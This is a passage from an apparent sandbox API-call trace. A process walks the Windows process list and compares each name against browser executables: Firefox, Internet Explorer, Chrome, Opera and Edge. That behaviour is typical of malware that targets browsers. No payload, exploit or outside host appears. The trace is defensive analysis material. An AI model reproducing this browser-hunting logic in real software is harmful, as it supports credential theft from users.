lpString2="opera.exe") returned -1 [0211.184] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.184] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.184] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0211.184] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0211.184] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0211.184] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0211.184] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.184] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.185] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0211.185] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0211.185] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0211.185] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0211.185] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.185] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.186] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.186] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.186] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.186] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.186] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0211.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0211.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0211.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0211.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0211.187] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0211.187] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0211.187] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0211.187] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0211.187] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.187] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0211.187] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0211.188] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0211.188] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0211.188] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0211.188] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0211.188] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0211.188] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0211.188] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0211.188] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0211.188] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0211.189] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0211.189] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0211.189] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0211.189] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0211.189] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0211.189] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0211.189] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0211.189] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0211.189] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0211.189] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0211.190] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0211.190] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0211.190] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0211.190] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0211.190] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0211.190] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0211.191] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0211.191] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0211.191] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0211.191] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0211.191] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0211.191] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0211.191] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0211.191] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0211.191] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0211.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0211.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0211.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0211.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0211.192] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0211.192] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0211.192] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0211.192] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0211.192] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0211.192] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0211.193] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0211.193] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0211.193] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0211.193] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0211.193] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0211.193] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0211.193] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0211.193] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0211.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0211.194] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0211.194] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0211.194] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0211.194] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0211.194] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0211.194] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0211.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0211.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0211.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0211.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0211.195] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0211.195] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0211.195] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0211.195] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0211.195] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0211.195] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0211.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0211.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0211.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0211.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0211.196] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0211.196] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0211.196] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0211.196] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0211.196] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0211.197] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0211.197] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0211.197] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0211.197] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0211.197] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0211.197] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0211.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0211.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0211.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0211.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0211.198] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0211.198] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0211.198] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0211.198] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0211.198] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0211.198] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0211.199] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0211.199] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0211.199] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0211.199] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0211.199] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.199] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0211.199] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0211.199] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0211.199] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0211.199] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.200] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.200] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.200] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.200] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.200] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.200] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0211.201] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0211.201] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0211.201] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0211.201] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.201] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.201] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.201] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.201] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.201] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0211.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0211.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0211.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0211.202] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.203] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.203] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.203] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.203] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.203] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.203] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.203] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.203] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.203] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0211.203] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0211.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0211.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0211.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0211.204] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.204] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0211.204] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0211.204] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0211.204] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0211.204] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.205] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 